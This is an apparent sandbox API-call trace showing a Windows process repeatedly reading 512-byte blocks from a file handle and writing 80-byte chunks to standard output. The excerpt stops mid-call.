SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.610] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.610] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.611] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.611] GetFileType (hFile=0x4c) returned 0x1 [0098.611] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.611] GetFileType (hFile=0x4c) returned 0x1 [0098.611] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.611] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.612] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.612] GetFileType (hFile=0x4c) returned 0x1 [0098.612] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.612] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.612] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.612] GetFileType (hFile=0x4c) returned 0x1 [0098.612] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.612] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.612] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.612] GetFileType (hFile=0x4c) returned 0x1 [0098.612] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.613] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.613] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.613] GetFileType (hFile=0x4c) returned 0x1 [0098.613] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.613] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.613] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.613] GetFileType (hFile=0x4c) returned 0x1 [0098.613] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.613] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.613] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.613] GetFileType (hFile=0x4c) returned 0x1 [0098.613] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.613] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.613] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.613] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.613] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.613] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.613] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.613] GetFileType (hFile=0x4c) returned 0x1 [0098.613] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.613] GetFileType (hFile=0x4c) returned 0x1 [0098.613] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.613] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.613] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.613] GetFileType (hFile=0x4c) returned 0x1 [0098.613] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.613] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.613] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.613] GetFileType (hFile=0x4c) returned 0x1 [0098.613] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] GetFileType (hFile=0x4c) returned 0x1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] GetFileType (hFile=0x4c) returned 0x1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] GetFileType (hFile=0x4c) returned 0x1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] GetFileType (hFile=0x4c) returned 0x1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.614] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.614] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.614] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.614] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] GetFileType (hFile=0x4c) returned 0x1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] GetFileType (hFile=0x4c) returned 0x1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] GetFileType (hFile=0x4c) returned 0x1 [0098.614] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.614] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] GetFileType (hFile=0x4c) returned 0x1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] GetFileType (hFile=0x4c) returned 0x1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] GetFileType (hFile=0x4c) returned 0x1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] GetFileType (hFile=0x4c) returned 0x1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] GetFileType (hFile=0x4c) returned 0x1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.615] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.615] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.615] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.615] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] GetFileType (hFile=0x4c) returned 0x1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] GetFileType (hFile=0x4c) returned 0x1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] GetFileType (hFile=0x4c) returned 0x1 [0098.615] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.615] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] GetFileType (hFile=0x4c) returned 0x1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] GetFileType (hFile=0x4c) returned 0x1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] GetFileType (hFile=0x4c) returned 0x1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] GetFileType (hFile=0x4c) returned 0x1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] GetFileType (hFile=0x4c) returned 0x1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.616] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.616] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.616] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.616] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] GetFileType (hFile=0x4c) returned 0x1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] GetFileType (hFile=0x4c) returned 0x1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.616] GetFileType (hFile=0x4c) returned 0x1 [0098.616] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] GetFileType (hFile=0x4c) returned 0x1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] GetFileType (hFile=0x4c) returned 0x1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] GetFileType (hFile=0x4c) returned 0x1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] GetFileType (hFile=0x4c) returned 0x1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] GetFileType (hFile=0x4c) returned 0x1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.617] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.617] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.617] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.617] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] GetFileType (hFile=0x4c) returned 0x1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.617] GetFileType (hFile=0x4c) returned 0x1 [0098.617] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] GetFileType (hFile=0x4c) returned 0x1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] GetFileType (hFile=0x4c) returned 0x1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] GetFileType (hFile=0x4c) returned 0x1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] GetFileType (hFile=0x4c) returned 0x1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] GetFileType (hFile=0x4c) returned 0x1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] GetFileType (hFile=0x4c) returned 0x1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.618] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.618] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.618] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.618] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] GetFileType (hFile=0x4c) returned 0x1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.618] GetFileType (hFile=0x4c) returned 0x1 [0098.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] GetFileType (hFile=0x4c) returned 0x1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] GetFileType (hFile=0x4c) returned 0x1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] GetFileType (hFile=0x4c) returned 0x1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] GetFileType (hFile=0x4c) returned 0x1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] GetFileType (hFile=0x4c) returned 0x1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] GetFileType (hFile=0x4c) returned 0x1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.619] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.619] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.619] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.619] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] GetFileType (hFile=0x4c) returned 0x1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.619] GetFileType (hFile=0x4c) returned 0x1 [0098.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] GetFileType (hFile=0x4c) returned 0x1 [0098.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.620] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, 